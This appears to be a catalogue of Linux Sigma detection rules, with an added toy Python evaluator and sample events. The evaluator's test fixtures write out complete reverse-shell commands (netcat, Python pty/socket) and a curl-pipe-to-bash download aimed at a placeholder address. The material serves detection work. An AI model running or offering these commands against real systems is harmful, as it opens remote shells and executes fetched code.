Sigma Rules
241 rules found
Mount Execution With Hidepid Parameter
Detects execution of the "mount" command with the "hidepid" parameter, which hides processes from other users on the system
Potential Netcat Reverse Shell Execution
Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
Shell Execution via Nice - Linux
Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Nohup Execution
Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
Suspicious Nohup Execution
Detects execution of binaries located in potentially suspicious locations via "nohup"
OMIGOD SCX RunAsProvider ExecuteScript
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute an arbitrary UNIX/Linux script using the /bin/sh shell. The script being executed is first written as a temporary file with a "scx*" prefix in the /tmp folder and is then invoked from the directory /etc/opt/microsoft/scx/conf/tmpdir/, where the file carries the same "scx*" prefix. SCXcore, which started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
OMIGOD SCX RunAsProvider ExecuteShellCommand
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute an arbitrary UNIX/Linux command using the /bin/sh shell. SCXcore, which started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Potential Perl Reverse Shell Execution
Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
Potential PHP Reverse Shell
Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
Pnscan Binary Data Transmission Activity
Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
Connection Proxy
Detects the setting of a proxy configuration
PUA - TruffleHog Execution - Linux
Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc., which could be used maliciously. While it is a legitimate tool, intended for use in CI pipelines and security assessments, it was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
Python WebServer Execution - Linux
Detects the execution of Python web servers via command line interface (CLI). After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software. This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.
Python Spawning Pretty TTY Via PTY Module
Detects a python process calling the PTY module in order to spawn a pseudo-terminal (the "pretty tty" of the rule title), which could be indicative of potential reverse shell activity.
Python Reverse Shell Execution Via PTY And Socket Modules
Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
Inline Python Execution - Spawn Shell Via OS System Library
Detects execution of inline Python code via the "-c" flag in order to call the "system" function from the "os" library and spawn a shell.
Remote Access Tool - Team Viewer Session Started On Linux Host
Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
Linux Remote System Discovery
Detects the enumeration of other remote systems.
Linux Package Uninstall
Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
Shell Execution via Rsync - Linux
Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Suspicious Invocation of Shell via Rsync
Detects the execution of a shell as a subprocess of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
Potential Ruby Reverse Shell
Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
Scheduled Cron Task/Job - Linux
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Security Software Discovery - Linux
Detects usage of system utilities (only grep and egrep for now) to discover installed security software
Disabling Security Tools
Detects the disabling of security tools
Disable Or Stop Services
Detects the usage of utilities such as 'systemctl' or 'service' to stop or disable tools and services
Setuid and Setgid
Detects suspicious changes of file ownership and permissions with the chown and chmod commands
Shell Invocation Via Ssh - Linux
Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Potential Linux Amazon SSM Agent Hijacking
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Chmod Suspicious Directory
Detects chmod targeting files in abnormal directory paths.
Container Residence Discovery Via Proc Virtual FS
Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
Suspicious Curl File Upload - Linux
Detects a suspicious curl process start that adds a file to a web request
Suspicious Curl Change User Agents - Linux
Detects a suspicious curl process start on linux with the user agent option set
Docker Container Discovery Via Dockerenv Listing
Detects listing or file reading of ".dockerenv", which can be a sign of potential container discovery
Potentially Suspicious Execution From Tmp Folder
Detects a potentially suspicious execution of a process located in the '/tmp/' folder
Potential Discovery Activity Using Find - Linux
Detects usage of "find" binary in a suspicious manner to perform discovery
Suspicious Git Clone - Linux
Detects execution of "git" in order to clone a remote repository whose name contains suspicious keywords
History File Deletion
Detects events in which a history file gets deleted, e.g. ~/.bash_history, to remove traces of malicious activity
Print History File Contents
Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
Linux HackTool Execution
Detects known hacktool execution based on image name.
Potential Container Discovery Via Inodes Listing
Detects listing of the inodes of the "/" directory to determine whether the process is running inside a container.
Interactive Bash Suspicious Children
Detects suspicious interactive bash as a parent to rather uncommon child processes
Suspicious Java Children Processes
Detects java process spawning suspicious children
Linux Network Service Scanning Tools Execution
Detects execution of network scanning and reconnaissance tools. These tools can be used, for example, for the enumeration of local or remote network services.
Linux Shell Pipe to Shell
Detects a suspicious process command line that starts with a shell executing something whose output is finally piped into another shell
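The rules "Potential Netcat Reverse Shell Execution", "Python Reverse Shell Execution Via PTY And Socket Modules", "Suspicious Invocation of Shell via Rsync" and "Linux Shell Pipe to Shell" above all describe command-line and parent/child patterns over process creation events. The following is an added example, not SigmaHQ's rules or tooling: a toy evaluator for Sigma-style detection dictionaries (field modifiers contains/startswith/endswith, the |all list modifier, and "selection and not filter" conditions), with rule bodies that paraphrase those four descriptions. The selection strings, field names and the sample events are constructed assumptions for illustration, not the strings of the real rules.

```python
"""Toy Sigma-style matcher over Linux process_creation events (added example,
not SigmaHQ rules or tooling). The rules paraphrase the descriptions of
"Potential Netcat Reverse Shell Execution", "Python Reverse Shell Execution Via
PTY And Socket Modules", "Suspicious Invocation of Shell via Rsync" and "Linux
Shell Pipe to Shell"; their exact strings are assumptions, not the real rules.
Supported: field keys with the contains/startswith/endswith modifiers, the
'|all' list modifier, and conditions of selection names joined by 'and'/'and not'.
"""

RULES = {  # dict form of what the YAML rule files would load into (constructed)
    "Potential Netcat Reverse Shell Execution": {"detection": {
        "selection": {"Image|endswith": ["/nc", "/ncat", "/netcat"],
                      "CommandLine|contains": [" -e /bin/sh", " -e /bin/bash",
                                               " -c /bin/sh", " -c /bin/bash"]},
        "condition": "selection"}},
    "Python Reverse Shell Execution Via PTY And Socket Modules": {"detection": {
        "selection": {"Image|contains": "/python",
                      "CommandLine|contains|all": ["import", "socket", "pty", ".spawn("]},
        "condition": "selection"}},
    "Suspicious Invocation of Shell via Rsync": {"detection": {
        "selection": {"ParentImage|endswith": "/rsync",
                      "Image|endswith": ["/sh", "/bash", "/dash", "/zsh"]},
        # a remote-shell command handed over with -e/--rsh is the expected case
        "filter_rsh": {"ParentCommandLine|contains": [" -e ", "--rsh"]},
        "condition": "selection and not filter_rsh"}},
    "Linux Shell Pipe to Shell": {"detection": {
        "selection": {"CommandLine|startswith": ["sh -c ", "bash -c "],
                      "CommandLine|contains": ["| sh", "| bash", "|sh", "|bash"]},
        "condition": "selection"}},
}


def match_field(event, key, wanted):
    """Apply one 'Field|modifier...' key to an event. A list of values is OR-ed,
    unless the '|all' modifier is present, in which case every value must hit."""
    field, _, mods = key.partition("|")
    modifiers = mods.split("|") if mods else []
    value = str(event.get(field, ""))
    op = next((m for m in modifiers if m != "all"), "equals")
    checks = {"contains": lambda w: w in value,
              "startswith": value.startswith,
              "endswith": value.endswith,
              "equals": lambda w: value == w}
    results = [checks[op](w) for w in (wanted if isinstance(wanted, list) else [wanted])]
    return all(results) if "all" in modifiers else any(results)


def match_selection(event, selection):
    """All keys inside one selection are AND-ed, as in Sigma."""
    return all(match_field(event, k, v) for k, v in selection.items())


def evaluate(rule, event):
    """Condition grammar supported here: 'sel1 and sel2 and not sel3'."""
    detection = rule["detection"]
    for term in detection["condition"].split(" and "):
        negated = term.startswith("not ")
        name = term[4:] if negated else term
        if match_selection(event, detection[name]) == negated:
            return False  # a required selection missed, or an excluded one hit
    return True


def matching_rules(event):
    return [title for title, rule in RULES.items() if evaluate(rule, event)]


# Constructed process_creation events; 203.0.113.0/24 is documentation address space.
EVENTS = {
    "nc_reverse": {"Image": "/usr/bin/nc", "CommandLine": "nc 203.0.113.5 4444 -e /bin/bash"},
    "nc_portscan": {"Image": "/usr/bin/nc", "CommandLine": "nc -zv 203.0.113.5 22"},
    "py_pty": {"Image": "/usr/bin/python3", "CommandLine":
               "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"203.0.113.5\",4444));"
               "[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"/bin/sh\")'"},
    "rsync_shell": {"Image": "/bin/sh", "CommandLine": "sh -c id", "ParentImage": "/usr/bin/rsync",
                    "ParentCommandLine": "rsync --server --sender -logDtpr . /srv/data"},
    "rsync_rsh": {"Image": "/bin/sh", "CommandLine": "sh -c 'ssh -p 2222 backup rsync --server . /srv'",
                  "ParentImage": "/usr/bin/rsync",
                  "ParentCommandLine": "rsync -av -e 'ssh -p 2222' /srv/data backup:/srv/"},
    "pipe_to_shell": {"Image": "/bin/sh", "CommandLine": 'sh -c "curl -s http://203.0.113.5/x.sh | bash"'},
    "pipe_benign": {"Image": "/bin/bash", "CommandLine": 'bash -c "ls -la | grep conf"'},
}

if __name__ == "__main__":
    for name, event in EVENTS.items():
        print(f"{name:14s} -> {matching_rules(event) or 'no match'}")
```

The rsync case is the one worth studying: the shell child alone is not the signal, the absence of "-e"/"--rsh" on the parent command line is, which is why it needs a filter selection rather than a single match list. Real Sigma rules are evaluated by sigma-cli or pySigma against a backend; this evaluator only reproduces enough of the semantics to show how selections, list modifiers and negated filters combine.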
Access of Sudoers File Content
Detects the execution of text-based file access or inspection utilities to read the content of /etc/sudoers, potentially in order to list all users that have sudo rights.
Linux Recon Indicators
Detects events with patterns found in commands used for reconnaissance on linux systems
Script Interpreter Spawning Credential Scanner - Linux
Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets, as seen in the "Shai-Hulud: The Second Coming" campaign.